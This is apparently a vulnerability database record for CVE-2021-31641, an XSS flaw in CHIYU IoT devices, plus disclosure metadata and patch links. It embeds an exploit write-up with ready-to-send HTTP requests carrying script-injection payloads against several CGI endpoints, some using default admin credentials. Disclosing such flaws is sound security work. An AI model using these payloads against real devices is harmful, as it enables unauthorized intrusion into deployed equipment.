ID
VAR-202106-1311
CVE
CVE-2021-31641
TITLE
plural CHIYU Technology Made IoT Cross-site scripting vulnerabilities in devices
Trust: 0.8
DESCRIPTION
An unauthenticated XSS vulnerability exists in several IoT devices from CHIYU Technology, including BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC due to a lack of sanitization when the HTTP 404 message is generated. An attacker can use this vulnerability to execute client code. # Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021 # Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC # CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643 # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. #1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices CVE ID: CVE-2021-31250 CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 ============= PoC 01 =============== Affected parameter: TF_submask Component: if.cgi Payload: "><script>alert(123)</script> HTTP Request: GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/ap_tcps.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_submask) 4. Submit the request and observe payload execution ============= PoC 02 =============== Affected parameter: TF_hostname=Component: dhcpc.cgi Payload: /"><img src="#"> HTTP request and response: HTTP Request: GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/wan_dc.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (dhcpc.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_hostname) 4. Submit the request and observe payload execution ============= PoC 03 =============== Affected parameter: TF_servicename=Component: ppp.cgi Payload: "><script>alert(123)</script> GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1 Host: 192.168.187.143 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.143/wan_pe.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (ppp.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_servicename) 4. Submit the request and observe payload execution ============= PoC 04 =============== Affected parameter: TF_port=Component: man.cgi Payload: /"><img src="#"> GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (man.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_port) 4. Submit the request and observe payload execution #2: Unauthenticated XSS in several CHIYU IoT devices CVE ID: CVE-2021-31641 Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641 Component: any argument passed via URL that results in an HTTP-404 Payload: http://ip/<script>alert(123)</script> Steps to reproduce: 1. Navigate to the webpage of the vulnerable device 2. On the web-browsers, you need to append the payload after the IP address (see payload above) 3. Submit the request and observe payload execution #3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices CVE ID: CVE-2021-31643 Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643 Affected parameter: username= Component: if.cgi Payload: "><script>alert(1)</script> HTTP request - SEMAC Web Ver7.2 GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh=; remote=00000000 Upgrade-Insecure-Requests: 1 HTTP request - BIOSENSE-III-COMBO(M1)(20000) GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh= Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (username) 4. Submit the request and observe payload execution
Trust: 2.34
AFFECTED PRODUCTS
| vendor: | chiyu tech | model: | bf-431 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | bf-430 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | bf-830w | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | semac d2 n300 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | semac d2 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | semac d4 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | semac s1 osdp | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | bfminiw | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | semac s3v3 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | webpass | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | bf-630 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | bf-631w | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | semac s2 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | bf-450m | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu tech | model: | semac d1 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | chiyu | model: | semac s3v3 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | semac d2 n300 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | semac s1 osdp | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | bf-431 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | semac s2 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | semac d1 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | bf-450m | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | semac d4 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | bf-430 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | chiyu | model: | semac d2 | scope: | - | version: | - | Trust: 0.8 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
PROBLEMTYPE DATA
| problemtype: | CWE-79 | Trust: 1.0 |
| problemtype: | Cross-site scripting (CWE-79) [NVD Evaluation ] | Trust: 0.8 |
THREAT TYPE
remote
Trust: 0.6
TYPE
xss
Trust: 0.7
PATCH
| title: | Firmware update | url: | https://www.chiyu-tech.com/msg/message-Firmware-update-87.html | Trust: 0.8 |
| title: | BF-630W Fixes for cross-site scripting vulnerabilities | url: | http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=153500 | Trust: 0.6 |
EXTERNAL IDS
| db: | NVD | id: | CVE-2021-31641 | Trust: 3.4 |
| db: | PACKETSTORM | id: | 162887 | Trust: 2.6 |
| db: | JVNDB | id: | JVNDB-2021-007489 | Trust: 0.8 |
| db: | CNNVD | id: | CNNVD-202106-017 | Trust: 0.6 |
| db: | VULMON | id: | CVE-2021-31641 | Trust: 0.1 |
REFERENCES
| url: | http://packetstormsecurity.com/files/162887/chiyu-iot-cross-site-scripting.html | Trust: 3.2 |
| url: | https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641 | Trust: 1.8 |
| url: | https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/#.yly_lxmslpy | Trust: 1.7 |
| url: | https://www.chiyu-tech.com/msg/message-firmware-update-87.html | Trust: 1.7 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2021-31641 | Trust: 0.9 |
| url: | https://cwe.mitre.org/data/definitions/79.html | Trust: 0.1 |
| url: | https://nvd.nist.gov | Trust: 0.1 |
| url: | http://192.168.187.12/ap_tcps.htm | Trust: 0.1 |
| url: | http://192.168.187.12/manage.htm | Trust: 0.1 |
| url: | https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643 | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2021-31250 | Trust: 0.1 |
| url: | https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks | Trust: 0.1 |
| url: | http://ip/<script>alert(123)</script> | Trust: 0.1 |
| url: | https://www.chiyu-tech.com/category-hardware.html | Trust: 0.1 |
| url: | https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 | Trust: 0.1 |
| url: | https://www.chiyu-tech.com/msg/msg88.html | Trust: 0.1 |
| url: | http://192.168.187.12/wan_dc.htm | Trust: 0.1 |
| url: | http://192.168.187.143/wan_pe.htm | Trust: 0.1 |
| url: | http://127.0.0.1/emprcd.htm | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2021-31643 | Trust: 0.1 |
CREDITS
sirpedrotavares
Trust: 0.1
SOURCES
| db: | VULMON | id: | CVE-2021-31641 |
| db: | JVNDB | id: | JVNDB-2021-007489 |
| db: | PACKETSTORM | id: | 162887 |
| db: | CNNVD | id: | CNNVD-202106-017 |
| db: | NVD | id: | CVE-2021-31641 |
LAST UPDATE DATE
2024-08-14T13:23:31.174000+00:00
SOURCES UPDATE DATE
| db: | VULMON | id: | CVE-2021-31641 | date: | 2021-06-08T00:00:00 |
| db: | JVNDB | id: | JVNDB-2021-007489 | date: | 2022-02-14T09:15:00 |
| db: | CNNVD | id: | CNNVD-202106-017 | date: | 2021-08-16T00:00:00 |
| db: | NVD | id: | CVE-2021-31641 | date: | 2021-06-08T20:26:41.403 |
SOURCES RELEASE DATE
| db: | VULMON | id: | CVE-2021-31641 | date: | 2021-06-01T00:00:00 |
| db: | JVNDB | id: | JVNDB-2021-007489 | date: | 2022-02-14T00:00:00 |
| db: | PACKETSTORM | id: | 162887 | date: | 2021-06-01T15:08:26 |
| db: | CNNVD | id: | CNNVD-202106-017 | date: | 2021-06-01T00:00:00 |
| db: | NVD | id: | CVE-2021-31641 | date: | 2021-06-01T15:15:07.680 |